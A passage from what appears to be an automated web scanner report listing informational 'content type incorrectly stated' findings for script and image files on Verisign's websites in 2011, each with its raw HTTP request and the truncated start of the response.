GET /assets/shared/js/jquery.url.packed.js HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:03 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Length: 1935Content-Type: text/html jQuery.url=function(){var segments={};var parsed={};var options={url:window.location,strictMode:false,key:["source","protocol","authority","userInfo","user","password","host","port","relative","path",...[SNIP]...
23.45. http://www.verisign.ch/assets/shared/js/leftnav_new.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.verisign.ch
Path:
/assets/shared/js/leftnav_new.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /assets/shared/js/leftnav_new.js HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621625|session#1315621535113-743172#1315623425|PC#1315621455064-973488.19#1378693568; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.3.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:44 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Length: 4994Content-Type: text/html /** * Version 2.0 * Author: Rob Perez * Date: August 20, 2010 * * Usage: * * Set a flag at the beginning of generateLeftNav to modify expansion behavior of the nav if desired. * * Somew...[SNIP]...
23.46. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.verisign.ch
Path:
/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:03 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7Content-Type: text/html Content-Length: 22346 //////////////////////////////////// //Main JS functions for verisign.com //////////////////////////////////// function findObj(n, d){ var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&pa...[SNIP]...
23.47. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.verisign.ch
Path:
/stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:03 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Length: 3364Content-Type: text/html ///////////////////////////////////////////////////////////////////////////// // Function : vrsnNavMenuElements // Comments : /////////////////////////////////////////////////////////////////////////...[SNIP]...
23.48. http://www.verisign.com/authweb/global/assets/header/js/flyouts.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.verisign.com
Path:
/authweb/global/assets/header/js/flyouts.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /authweb/global/assets/header/js/flyouts.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:18 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:18 GMTContent-Type: text/html Content-Length: 8048 //----------------------------------------// // My Account M-flyout form functionality //----------------------------------------// $("#myacc_search_btn").click(function(){ //document.get...[SNIP]...
23.49. http://www.verisign.com/authweb/global/assets/header/js/header.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.verisign.com
Path:
/authweb/global/assets/header/js/header.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /authweb/global/assets/header/js/header.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:18 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:18 GMT Content-Length: 1558Content-Type: text/html /******************************************* ** Header functions ** *******************************************/ //----------------------------------------// //Load Defaults when DOM i...[SNIP]...
23.50. http://www.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.verisign.com
Path:
/authweb/global/assets/header/js/jquery.autocomplete.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /authweb/global/assets/header/js/jquery.autocomplete.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:19 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:19 GMTContent-Type: text/html Content-Length: 22148 /* * jQuery Autocomplete plugin 1.1 * * Copyright (c) 2009 J..rn Zaefferer * * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org/licenses/mit-license.php * ht...[SNIP]...
23.51. http://www.verisign.com/authweb/global/assets/shared/images/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.verisign.com
Path:
/authweb/global/assets/shared/images/favicon.ico
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain unrecognised content .
Request
GET /authweb/global/assets/shared/images/favicon.ico HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621614|session#1315621455064-973488#1315623414|PC#1315621455064-973488.19#1378693554; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Last-Modified: Wed, 19 Jan 2011 20:24:14 GMT Accept-Ranges: bytes Content-Length: 1150 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:26:10 GMTContent-Type: text/html ............ .h.......(....... ..... .....@......................................>...........................................................q...................................9.........................[SNIP]...
23.52. http://www.verisign.com/authweb/global/assets/shared/images/partners-featured-ssl-promo.jpg
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.verisign.com
Path:
/authweb/global/assets/shared/images/partners-featured-ssl-promo.jpg
Issue detail
The response contains the following Content-type statement:The response states that it contains a JPEG image . However, it actually appears to contain a GIF image .
Request
GET /authweb/global/assets/shared/images/partners-featured-ssl-promo.jpg HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:47 GMT Server: Apache Last-Modified: Wed, 19 Jan 2011 20:24:14 GMT Accept-Ranges: bytes Content-Length: 15431 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:24:47 GMTContent-Type: image/jpeg GIF89a..............Os.............l.qqr.......-...........Yg......"?|NP......................$H..............................NQe.N+.....u.q..........3ny..4^..........<{...............Z:&1......?f.......[SNIP]...
23.53. http://www.verisign.com/authweb/global/assets/shared/images/ps-freetrial-promo.jpg
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.verisign.com
Path:
/authweb/global/assets/shared/images/ps-freetrial-promo.jpg
Issue detail
The response contains the following Content-type statement:The response states that it contains a JPEG image . However, it actually appears to contain a GIF image .
Request
GET /authweb/global/assets/shared/images/ps-freetrial-promo.jpg HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:47 GMT Server: Apache Last-Modified: Wed, 19 Jan 2011 20:24:14 GMT Accept-Ranges: bytes Content-Length: 14365 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:24:47 GMTContent-Type: image/jpeg GIF89a.....................3.....K..{...................................................................................s...............................s...u....Bh..................... !!.....f...QXVw...[SNIP]...
23.54. http://www.verisign.com/authweb/global/assets/shared/js/globals.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.verisign.com
Path:
/authweb/global/assets/shared/js/globals.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /authweb/global/assets/shared/js/globals.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:17 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:17 GMT Content-Length: 3608Content-Type: text/html /******************************************* ** Utility functions ** *******************************************/ function linkPopUp(url) { popupWin = window.open...[SNIP]...
23.55. http://www.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.boxshadow.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /authweb/global/assets/shared/js/jquery.boxshadow.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:17 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:17 GMT Content-Length: 1538Content-Type: text/html /* ** * jquery-boxshadow.js * * $(object).boxshadow({ * hOffset : 3, * vOffset : 3, * shadowblur : 3, * color : '#808080' * }) * * If you are using this with IE, you should s...[SNIP]...
23.56. http://www.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.cacheimage.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /authweb/global/assets/shared/js/jquery.cacheimage.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:17 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:17 GMT Content-Length: 1356Content-Type: text/html /* * cacheImage: a jQuery plugin * * cacheImage is a simple jQuery plugin for pre-caching images. The * plugin can be used to eliminate flashes of unstyled content (FOUC) and * improve perceived...[SNIP]...
23.57. http://www.verisign.com/authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/code-signing/index.html?tid=a_box User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:08 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:27:08 GMTContent-Type: text/html Content-Length: 15622 /* * FancyBox - jQuery Plugin * Simple and fancy lightbox alternative * * Examples and documentation at: http://fancybox.net * * Copyright (c) 2008 - 2010 Janis Skarnelis * That said, it is har...[SNIP]...
23.58. http://www.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.hover_intent.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /authweb/global/assets/shared/js/jquery.hover_intent.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:17 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:17 GMT Content-Length: 1614Content-Type: text/html /** * hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+ * <http://cherne.net/brian/resources/jquery.hoverIntent.html> * * @param f onMouseOver function || An object with configuration options * @p...[SNIP]...
23.59. http://www.verisign.com/authweb/global/assets/shared/js/jquery.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain CSS .
Request
GET /authweb/global/assets/shared/js/jquery.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:16 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:16 GMTContent-Type: text/html Content-Length: 78803 /*! * jQuery JavaScript Library v1.4.4 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Incl...[SNIP]...
23.60. http://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.verisign.com
Path:
/authweb/global/assets/shared/js/rotator.custom.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /authweb/global/assets/shared/js/rotator.custom.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ssl/buy-ssl-certificates/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:59:43 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:59:43 GMT Content-Length: 985Content-Type: text/html $(document).ready (function(){ bannerFadeIn = 0; bannerFadeOut = 0; $("#prevnext a.prev").click(function(e){ var currIndex = $("#banner-controls a").index($("#banner-controls a.selected")) + ...[SNIP]...
23.61. http://www.verisign.com/authweb/global/assets/shared/js/rotator.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.verisign.com
Path:
/authweb/global/assets/shared/js/rotator.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /authweb/global/assets/shared/js/rotator.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ssl/buy-ssl-certificates/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:59:43 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:59:43 GMT Content-Length: 4102Content-Type: text/html var activeBannerId = ""; var activeBannerControllerId = ""; var activeTipId = ""; var rotate = true; var myBannerNumber = 1; var activeBannerNumber = myBannerNumber; var bannerItemsLength = $(...[SNIP]...
23.62. http://www.verisign.com/stellent/groups/public/documents/image/dev041741.jpg
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.verisign.com
Path:
/stellent/groups/public/documents/image/dev041741.jpg
Issue detail
The response contains the following Content-type statement:The response states that it contains a JPEG image . However, it actually appears to contain a GIF image .
Request
GET /stellent/groups/public/documents/image/dev041741.jpg HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ssl/buy-ssl-certificates/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474
Response
